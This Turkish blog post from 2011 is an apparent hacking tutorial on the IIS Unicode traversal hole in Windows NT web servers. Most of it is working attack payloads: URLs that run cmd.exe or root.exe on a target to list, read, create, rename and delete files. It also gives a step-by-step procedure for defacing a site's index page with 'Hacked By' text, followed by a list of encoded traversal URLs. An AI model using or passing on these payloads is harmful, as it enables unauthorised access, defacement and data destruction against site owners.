2 Ağustos 2011 Salı

Unicode Açığı

Unicode Açığı
Şimdi mantık şu Winnt sistemlerde bulunan cmd.exe root.exe sayesinde kendinizi o sistemin içine yollarsınız


şimdi sisteme girmek için bazı dosyaları kullancaz

Cmd.exe
Root.exe

bunlar işte girmek için kullanıcaz www.target.com/c/winnt/system32/cmd.exe?c+dir
www.target.com/c/winnt/system32/root.exe?c+dir
www.target.com/c/winnt/system32/cmd1.exe?c+dir
gibi
bunlar ama root exe bazen burda olmuyor diğer yolu
www.target.com/c/ınetpub/scripts/root.exe?c+dir
Bunlar işte kısaca mesela echo kullanırken root.exe kullanın

Komutlar

Klasör oluşturur
www.target.com/c/winnt/system32/root.exe?c+mkdir+c:\HackedbyX
İsmi değiştir
www.target.com/c/winnt/system32/root.exe?c+rename+c:\index.html+hacked.html
İçeriğini gösterir
www.target.com/c/winnt/system32/root.exe?c+type+c:\index.html
yazı yaz
www.target.com/c/winnt/system32/root.exe?c+echo+Hacked By GEnhack+>c:\index.html
silmek
www.target.com/c/winnt/system32/root.exe?c+del+c:\index.html
www.target.com/c/winnt/system32/root.exe?c+copy+c:\index.htm+c:\
Şimdi bir örnek :
ARkadaşlar şimdi diyelim sisteme girdiniz sonra
inetpub/wwwroot içine gidin ve indexi silin sonra herhangi bir htmlye ordaki hacked bilmemne felam yazın işte sonra rename yapın index.html yapın o dosyayı ve artık ) hacklendi Böyle yaparsanız İnternal SErver Error Vermez .
ve burda verildiği gibi password dosyasını  kırma olyaının olmadığını gormus oluyorsunuz.unicode acıklarını bulmak için cgi scanner programını kullanabilirsiniz oldukça kullanışlı size unicode kodlarını verecem
http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/_vti_bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/_vti_bin/..À¯../winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/scripts/Áœ/winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/
http://www.target.com/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/
cmd.exe ulaşmanız için verdim
write
Gönderen zaman:
Etiketler: , , ,

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)